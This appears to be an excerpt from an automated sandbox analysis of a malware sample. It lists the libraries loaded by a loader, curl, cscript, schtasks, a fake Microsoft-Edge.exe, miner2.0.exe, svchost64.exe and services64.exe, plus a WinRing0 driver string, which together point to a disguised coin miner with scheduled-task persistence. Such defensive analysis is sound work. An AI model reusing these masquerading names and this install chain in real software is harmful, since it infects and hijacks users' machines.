                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: pcacli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: sfc_os.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Section loaded: ondemandconnroutehelper.dll (identical event recorded 41 times in succession)
                        Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\cscript.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\cscript.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cscript.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\cscript.exe | Section loaded: sxs.dll
                        Source: C:\Windows\System32\cscript.exe | Section loaded: vbscript.dll
                        Source: C:\Windows\System32\cscript.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\cscript.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Section loaded: ondemandconnroutehelper.dll (28 consecutive loads)
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: ucrtbase_clr0400.dll (2 consecutive loads)
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 consecutive loads)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 consecutive loads)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: ucrtbase_clr0400.dll (2 consecutive loads)
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 consecutive loads)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: version.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\services64.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: file.exe | Static file information: File size 1862656 > 1048576
                        Source: file.exe | Static PE information: Raw size of nataabbx is bigger than: 0x100000 < 0x195200
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr

                        Data Obfuscation

